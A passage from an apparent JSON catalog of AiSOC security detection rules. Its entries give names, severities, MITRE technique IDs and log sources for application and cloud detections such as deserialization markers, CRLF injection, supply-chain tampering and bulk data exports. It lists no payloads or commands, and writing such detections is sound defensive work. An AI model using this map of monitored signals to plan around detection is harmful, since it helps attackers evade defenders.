Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-spring4shell-pattern.yaml" }, { "id": "det-application-038", "type": "detection", "name": "Java/.NET Deserialization Marker In Body", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Java/.NET Deserialization Marker In Body'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1059" ], "log_source": "waf", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-deserialization-rce-marker.yaml" }, { "id": "det-application-039", "type": "detection", "name": "Session Cookie Failed HMAC Verification", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Session Cookie Failed HMAC Verification'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1185" ], "log_source": "application", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-cookie-tampered-hmac.yaml" }, { "id": "det-application-040", "type": "detection", "name": "High Volume Of Password Reset Requests From Single IP", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'High Volume Of Password Reset Requests From Single IP'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1110" ], "log_source": "application", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-account-enum-reset.yaml" }, { "id": "det-application-041", "type": "detection", "name": "WebSocket Upgrade From Cross-Origin Header", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'WebSocket Upgrade From Cross-Origin Header'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "application", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-websocket-origin-bypass.yaml" }, { "id": "det-application-042", "type": "detection", "name": "CRLF Sequence In HTTP Header Value", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'CRLF Sequence In HTTP Header Value'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "waf", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-crlf-header-injection.yaml" }, { "id": "det-application-043", "type": "detection", "name": "CNAME Pointing To Deleted SaaS Tenant", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'CNAME Pointing To Deleted SaaS Tenant'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1583.001" ], "log_source": "dns", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-subdomain-takeover-cname.yaml" }, { "id": "det-application-044", "type": "detection", "name": "CORS Response With Wildcard Origin And Credentials Allowed", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'CORS Response With Wildcard Origin And Credentials Allowed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "application", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-cors-wildcard-with-creds.yaml" }, { "id": "det-application-045", "type": "detection", "name": "Content-Security-Policy Header Removed From Production Response", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Content-Security-Policy Header Removed From Production Response'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "application", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-csp-disabled.yaml" }, { "id": "det-application-046", "type": "detection", "name": "CI Workflow Modified By Account Without CODEOWNER Approval", "description": "AiSOC v1 curated detection. 
Triggers on the application signal described by 'CI Workflow Modified By Account Without CODEOWNER Approval'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1199" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-ci-workflow-modified-by-non-owner.yaml" }, { "id": "det-application-047", "type": "detection", "name": "Self-Hosted Runner Registered From External IP", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Self-Hosted Runner Registered From External IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1199" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-self-hosted-runner-external.yaml" }, { "id": "det-application-048", "type": "detection", "name": "Build Artifact Signing Key Rotated Outside Maintenance Window", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Build Artifact Signing Key Rotated Outside Maintenance Window'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1554" ], "log_source": "ci", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-build-signing-key-rotated.yaml" }, { "id": "det-application-049", "type": "detection", "name": "Helm Install From Unknown Chart Repository", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Helm Install From Unknown Chart Repository'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "kubernetes", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-helm-chart-untrusted-repo.yaml" }, { "id": "det-application-050", "type": "detection", "name": "terraform destroy Run Targeting Production Workspace", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'terraform destroy Run Targeting Production Workspace'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "application", "mitre_techniques": [ "T1485" ], "log_source": "terraform", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-terraform-destroy-prod.yaml" }, { "id": "det-application-051", "type": "detection", "name": "Newly Created Secret Has Slack Webhook Pattern", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Newly Created Secret Has Slack Webhook Pattern'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1078" ], "log_source": "vault", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-secret-published-to-slack.yaml" }, { "id": "det-application-052", "type": "detection", "name": "SSH Deploy Key Added To GitHub Repository", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SSH Deploy Key Added To GitHub Repository'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1098.004" ], "log_source": "github", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-deploy-key-added-github.yaml" }, { "id": "det-application-053", "type": "detection", "name": "NPM Package Published From New Account", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'NPM Package Published From New Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "npm", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-npm-package-publish-new-account.yaml" }, { "id": "det-application-054", "type": "detection", "name": "PyPI Package Published From New IP", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'PyPI Package Published From New IP'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "pypi", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-pypi-package-publish-new-ip.yaml" }, { "id": "det-application-055", "type": "detection", "name": "Docker Daemon Started With --insecure-registry Flag", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Docker Daemon Started With --insecure-registry Flag'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1195.002" ], "log_source": "docker", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-docker-insecure-registry-flag.yaml" }, { "id": "det-application-056", "type": "detection", "name": "Container Image With Critical CVE Pushed To Prod Registry", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Container Image With Critical CVE Pushed To Prod Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1525" ], "log_source": "container-registry", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-image-critical-cve-pushed.yaml" }, { "id": "det-application-057", "type": "detection", "name": "Branch Protection Disabled On Protected Branch", "description": "AiSOC v1 curated detection. 
Triggers on the application signal described by 'Branch Protection Disabled On Protected Branch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1098.004" ], "log_source": "github", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-protected-branch-disabled.yaml" }, { "id": "det-application-058", "type": "detection", "name": "Salesforce Mass Data Export Initiated", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Salesforce Mass Data Export Initiated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "salesforce", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-salesforce-mass-export.yaml" }, { "id": "det-application-059", "type": "detection", "name": "Salesforce Sandbox Refreshed Outside Change Window", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Salesforce Sandbox Refreshed Outside Change Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1199" ], "log_source": "salesforce", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-salesforce-sandbox-refresh-anomaly.yaml" }, { "id": "det-application-060", "type": "detection", "name": "Workday Banking Info Changed Without HR Ticket", "description": "AiSOC v1 curated detection. 
Triggers on the application signal described by 'Workday Banking Info Changed Without HR Ticket'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1098" ], "log_source": "workday", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-workday-bank-info-changed.yaml" }, { "id": "det-application-061", "type": "detection", "name": "Zoom Cloud Recording Shared Externally", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Zoom Cloud Recording Shared Externally'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "zoom", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-zoom-recording-shared-external.yaml" }, { "id": "det-application-062", "type": "detection", "name": "Box Created Many Public Links In Short Window", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Box Created Many Public Links In Short Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1567.002" ], "log_source": "box", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-box-public-link-mass-create.yaml" }, { "id": "det-application-063", "type": "detection", "name": "Notion Workspace Exported By Non-Admin", "description": "AiSOC v1 curated detection. 
Triggers on the application signal described by 'Notion Workspace Exported By Non-Admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "notion", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-notion-workspace-export.yaml" }, { "id": "det-application-064", "type": "detection", "name": "Confluence Bulk Space Export", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Confluence Bulk Space Export'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "confluence", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-confluence-space-export-bulk.yaml" }, { "id": "det-application-065", "type": "detection", "name": "ServiceNow Bulk Record Export", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'ServiceNow Bulk Record Export'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1530" ], "log_source": "servicenow", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-servicenow-record-export-bulk.yaml" }, { "id": "det-application-066", "type": "detection", "name": "Slack File Shared To External Channel", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Slack File Shared To External Channel'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1567.002" ], "log_source": "slack", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-slack-file-shared-external.yaml" }, { "id": "det-application-067", "type": "detection", "name": "Slack Private Channel Converted To Public", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'Slack Private Channel Converted To Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "application", "mitre_techniques": [ "T1213" ], "log_source": "slack", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-slack-channel-public-conversion.yaml" }, { "id": "det-application-068", "type": "detection", "name": "OneDrive Anonymous Sharing Link Created For Sensitive File", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'OneDrive Anonymous Sharing Link Created For Sensitive File'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1567.002" ], "log_source": "m365", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-onedrive-anonymous-link-sensitive.yaml" }, { "id": "det-application-069", "type": "detection", "name": "SharePoint Tenant-Wide Guest Access Enabled", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'SharePoint Tenant-Wide Guest Access Enabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1078.004" ], "log_source": "m365", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-sharepoint-guest-tenantwide.yaml" }, { "id": "det-application-070", "type": "detection", "name": "GraphQL Mutation Executed By Anonymous Caller", "description": "AiSOC v1 curated detection. Triggers on the application signal described by 'GraphQL Mutation Executed By Anonymous Caller'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "application", "mitre_techniques": [ "T1190" ], "log_source": "api-gateway", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/application/app-graphql-mutation-anonymous.yaml" }, { "id": "det-cloud-001", "type": "detection", "name": "AWS Root Account Console Login", "description": "Detects any console sign-in event using the AWS root account. Root account usage outside of initial setup or emergency break-glass scenarios should trigger immediate investigation. Best practice requires MFA on the root account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-root-account-login.yaml" }, { "id": "det-cloud-002", "type": "detection", "name": "AWS IAM Enumeration Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Enumeration Burst'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1087.004", "T1069.003" ], "log_source": "aws", "playbook": "tpl-cloud-recon", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-enumeration.yaml" }, { "id": "det-cloud-003", "type": "detection", "name": "AWS S3 Bucket Made Public", "description": "Detects when an S3 bucket ACL or bucket policy is modified to allow public read or public read-write access, which can lead to data exposure or unauthorised data exfiltration; public write access additionally allows objects to be modified or planted. Account- or bucket-level S3 Block Public Access settings, where enabled, override such grants, so confirm the bucket's effective public status before escalating.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-public-bucket.yaml" }, { "id": "det-cloud-004", "type": "detection", "name": "AWS S3 Bucket Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Bucket Deletion'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-bucket-deletion.yaml" }, { "id": "det-cloud-005", "type": "detection", "name": "AWS EC2 Instance Launched in Unauthorized Region", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 Instance Launched in Unauthorized Region'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1578.002" ], "log_source": "aws", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-launch-foreign-region.yaml" }, { "id": "det-cloud-006", "type": "detection", "name": "AWS Security Group Opened to 0.0.0.0/0", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Security Group Opened to 0.0.0.0/0'. Note that 0.0.0.0/0 covers IPv4 only; confirm the rule also catches the IPv6 equivalent (::/0), and prioritise world-open ingress on management ports such as SSH and RDP. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190", "T1133" ], "log_source": "aws", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-security-group-open-world.yaml" }, { "id": "det-cloud-007", "type": "detection", "name": "AWS IAM Policy with Wildcard Action", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Policy with Wildcard Action'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.001" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-policy-permissive.yaml" }, { "id": "det-cloud-008", "type": "detection", "name": "AWS KMS Key Disabled or Scheduled for Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS KMS Key Disabled or Scheduled for Deletion'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485", "T1486" ], "log_source": "aws", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-kms-key-disable.yaml" }, { "id": "det-cloud-009", "type": "detection", "name": "AWS CloudTrail Logging Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS CloudTrail Logging Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cloudtrail-disabled.yaml" }, { "id": "det-cloud-010", "type": "detection", "name": "AWS Lambda Function with Public Invoke Permission", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda Function with Public Invoke Permission'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "aws", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-lambda-permissive-trigger.yaml" }, { "id": "det-cloud-011", "type": "detection", "name": "AWS VPC Flow Logs Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS VPC Flow Logs Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-vpc-flow-logs-disabled.yaml" }, { "id": "det-cloud-012", "type": "detection", "name": "AWS RDS Instance Set Publicly Accessible", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Instance Set Publicly Accessible'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190", "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-publicly-accessible.yaml" }, { "id": "det-cloud-013", "type": "detection", "name": "AWS EBS Snapshot Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EBS Snapshot Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ebs-snapshot-public.yaml" }, { "id": "det-cloud-014", "type": "detection", "name": "AWS AssumeRole from Untrusted External Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS AssumeRole from Untrusted External Account'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1199" ], "log_source": "aws", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-cross-account-assumerole.yaml" }, { "id": "det-cloud-015", "type": "detection", "name": "AWS S3 GetObject Volume Anomaly per Principal", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 GetObject Volume Anomaly per Principal'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-mass-getobject.yaml" }, { "id": "det-cloud-016", "type": "detection", "name": "Azure AD Owner/Global-Admin Role Assignment", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Owner/Global-Admin Role Assignment'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1098.003" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-role-owner-assignment.yaml" }, { "id": "det-cloud-017", "type": "detection", "name": "Azure AD Application Credential Added", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Application Credential Added'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-app-secret-added.yaml" }, { "id": "det-cloud-018", "type": "detection", "name": "Azure AD Conditional Access Policy Disabled or Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Conditional Access Policy Disabled or Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.001" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-conditional-access-disabled.yaml" }, { "id": "det-cloud-019", "type": "detection", "name": "Azure Key Vault Key Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Key Vault Key Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-keyvault-key-deleted.yaml" }, { "id": "det-cloud-020", "type": "detection", "name": "Azure NSG Rule Allowing 0.0.0.0/0 Inbound", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure NSG Rule Allowing 0.0.0.0/0 Inbound'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "azure", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-nsg-allow-all-inbound.yaml" }, { "id": "det-cloud-021", "type": "detection", "name": "Azure Storage Account Container Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Storage Account Container Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "azure", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-storage-public-blob.yaml" }, { "id": "det-cloud-022", "type": "detection", "name": "Azure AD MFA Disabled for User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD MFA Disabled for User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556.006" ], "log_source": "azure", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-ad-mfa-disabled-for-user.yaml" }, { "id": "det-cloud-023", "type": "detection", "name": "Azure AD App Registration Granted Broad Graph Scope", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD App Registration Granted Broad Graph Scope'. 
